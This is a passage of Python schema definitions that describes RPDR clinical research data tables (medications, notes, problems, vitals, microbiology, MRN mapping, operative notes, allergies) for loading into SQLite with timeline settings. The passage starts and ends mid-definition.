foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Accession",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Source",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
)
]
)
#--------------------------------------------------------------------------------------------
# define Lhm RPDR table
Lhm = Table(
name = 'Lhm',
fileExt = 'txt',
csvDialect = StandardCsvDialect,
freeTextReportInLastColumn = False,
useInTimeline = True,
columns=[
TableColumn(
name = "EMPI",
type = "TEXT",
primaryKey = False,
index = True,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "System",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "LMR_Health_Maintenance_Date_Time",
type = "DATETIME",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = True,
timelineBlurb = False,
dateReformat = DateReformat( format='%m/%d/%Y %H:%M', reformat=SQLITE_DATE_FORMAT )
),
TableColumn(
name = "LMR_Text_Name",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = True,
dateReformat = None
),
TableColumn(
name = "Code",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "LMR_Code_Name",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Result",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Result_Text",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Comments",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
)
]
)
#--------------------------------------------------------------------------------------------
# define Lme RPDR table
Lme = Table(
name = 'Lme',
fileExt = 'txt',
csvDialect = StandardCsvDialect,
freeTextReportInLastColumn = False,
useInTimeline = True,
columns=[
TableColumn(
name = "EMPI",
type = "TEXT",
primaryKey = False,
index = True,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "LMR_Medication_Date_Time",
type = "DATETIME",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = True,
timelineBlurb = False,
dateReformat = DateReformat( format='%m/%d/%Y %H:%M', reformat=SQLITE_DATE_FORMAT )
),
TableColumn(
name = "LMR_Text_Med_Name",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = True,
dateReformat = None
),
TableColumn(
name = "Generic_ID",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Rollup_ID",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "LMR_Code_Med_Name",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Med_ID",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Med_Freq",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Med_Route",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Dose",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Units",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Take_Dose",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Take_Units",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Dispense",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Dispense_Units",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Duration",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Duration_Units",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Refills",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "PRN",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Rx",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "No_Substitutions",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Directions",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Comments",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
)
]
)
#--------------------------------------------------------------------------------------------
# define Lno RPDR table
Lno = Table(
name = 'Lno',
fileExt = 'txt',
csvDialect = StandardCsvDialect,
freeTextReportInLastColumn = True,
useInTimeline = True,
columns=[
TableColumn(
name = "EMPI",
type = "TEXT",
primaryKey = False,
index = True,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "LMRNote_Date",
type = "DATETIME",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = True,
timelineBlurb = False,
dateReformat = DateReformat( format='%m/%d/%Y %H:%M', reformat=SQLITE_DATE_FORMAT )
),
TableColumn(
name = "Record_Id",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Status",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Author",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "COD",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Institution",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Author_MRN",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Subject",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = True,
dateReformat = None
),
TableColumn(
name = "Comments",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
)
]
)
#--------------------------------------------------------------------------------------------
# define Lpr RPDR table
Lpr = Table(
name = 'Lpr',
fileExt = 'txt',
csvDialect = StandardCsvDialect,
freeTextReportInLastColumn = False,
useInTimeline = True,
columns=[
TableColumn(
name = "EMPI",
type = "TEXT",
primaryKey = False,
index = True,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "LMR_Problem_Date",
type = "DATETIME",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = True,
timelineBlurb = False,
dateReformat = DateReformat( format='%m/%d/%Y', reformat=SQLITE_DATE_FORMAT )
),
TableColumn(
name = "LMR_Text_Description",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = True,
dateReformat = None
),
TableColumn(
name = "Concept_ID",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "LMR_Code_Description",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Comments",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Onset_Date",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Resolution_Date",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Procedure_Date",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Modifiers",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Acuity",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Severity",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Condition",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Sensitivity_Flag",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Location",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
)
]
)
#--------------------------------------------------------------------------------------------
# define Lvs RPDR table
Lvs = Table(
name = 'Lvs',
fileExt = 'txt',
csvDialect = StandardCsvDialect,
freeTextReportInLastColumn = False,
useInTimeline = True,
columns=[
TableColumn(
name = "EMPI",
type = "TEXT",
primaryKey = False,
index = True,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "LMR_Vital_Date_Time",
type = "DATETIME",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = True,
timelineBlurb = False,
dateReformat = DateReformat( format='%m/%d/%Y %H:%M', reformat=SQLITE_DATE_FORMAT )
),
TableColumn(
name = "LMR_Text_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = True,
dateReformat = None
),
TableColumn(
name = "Code",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "LMR_Code_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Result",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Units",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Site",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Position",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Rythm",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
)
]
)
#--------------------------------------------------------------------------------------------
# define Mcm RPDR table
Mcm = Table(
name = 'Mcm',
fileExt = 'txt',
csvDialect = StandardCsvDialect,
freeTextReportInLastColumn = False,
useInTimeline = False,
columns=[
TableColumn(
name = "Control_Patient_EMPI",
type = "TEXT",
primaryKey = False,
index = True,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Case_Patient_EMPI",
type = "TEXT",
primaryKey = False,
index = True,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Match_Strength",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
)
]
)
#--------------------------------------------------------------------------------------------
# define Med RPDR table
Med = Table(
name = 'Med',
fileExt = 'txt',
csvDialect = StandardCsvDialect,
freeTextReportInLastColumn = False,
useInTimeline = True,
columns=[
TableColumn(
name = "EMPI",
type = "TEXT",
primaryKey = False,
index = True,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Medication_Date",
type = "DATETIME",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = True,
timelineBlurb = False,
dateReformat = DateReformat( format='%m/%d/%Y', reformat=SQLITE_DATE_FORMAT )
),
TableColumn(
name = "Medication",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = True,
dateReformat = None
),
TableColumn(
name = "Code_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Code",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Quantity",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Provider",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Clinic",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Hospital",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Inpatient_Outpatient",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Encounter_number",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
)
]
)
#--------------------------------------------------------------------------------------------
# define Mic RPDR table
Mic = Table(
name = 'Mic',
fileExt = 'txt',
csvDialect = StandardCsvDialect,
freeTextReportInLastColumn = True,
useInTimeline = True,
columns=[
TableColumn(
name = "EMPI",
type = "TEXT",
primaryKey = False,
index = True,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Microbiology_Number",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Microbiology_Date_Time",
type = "DATETIME",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = True,
timelineBlurb = False,
dateReformat = DateReformat( format='%m/%d/%Y %H:%M:%S', reformat=SQLITE_DATE_FORMAT )
),
TableColumn(
name = "Specimen_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = True,
dateReformat = None
),
TableColumn(
name = "Specimen_Comments",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Test_Name",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Test_Code",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Test_Comments",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Test_Status",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Organism_Name",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Organism_Code",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Organism_Comment",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Organism_Text",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
)
]
)
#--------------------------------------------------------------------------------------------
# define Mrn RPDR table
Mrn = Table(
name = 'Mrn',
fileExt = 'txt',
csvDialect = StandardCsvDialect,
freeTextReportInLastColumn = False,
useInTimeline = False,
columns=[
TableColumn(
name = "IncomingId",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "IncomingSite",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Status",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Enterprise_Master_Patient_Index",
type = "TEXT",
primaryKey = True,
index = False,
unique = True,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MGH_MRN",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "BWH_MRN",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "FH_MRN",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "SRH_MRN",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "NWH_MRN",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "NSMC_MRN",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MCL_MRN",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
)
]
)
#--------------------------------------------------------------------------------------------
# define Opn RPDR table
Opn = Table(
name = 'Opn',
fileExt = 'txt',
csvDialect = StandardCsvDialect,
freeTextReportInLastColumn = True,
useInTimeline = True,
columns=[
TableColumn(
name = "EMPI",
type = "TEXT",
primaryKey = False,
index = True,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Report_Number",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MID",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Report_Date_Time",
type = "DATETIME",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = True,
timelineBlurb = False,
dateReformat = DateReformat( format='%m/%d/%Y %I:%M:%S %p', reformat=SQLITE_DATE_FORMAT )
),
TableColumn(
name = "Report_Description",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = True,
dateReformat = None
),
TableColumn(
name = "Report_Status",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Report_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Report_Text",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
)
]
)
#--------------------------------------------------------------------------------------------
# define Pal RPDR table
Pal = Table(
name = 'Pal',
fileExt = 'txt',
csvDialect = StandardCsvDialect,
freeTextReportInLastColumn = False,
useInTimeline = True,
columns=[
TableColumn(
name = "EMPI",
type = "TEXT",
primaryKey = False,
index = True,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "System",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "PEARAllergy_Date_Time",
type = "DATETIME",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = True,
timelineBlurb = False,
dateReformat = DateReformat( format='%m/%d/%Y %H:%M:%S', reformat=SQLITE_DATE_FORMAT )
),
TableColumn(
name = "Allergen",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = True,
dateReformat = None
),
TableColumn(
name = "Allergen_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Allergen_Code",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
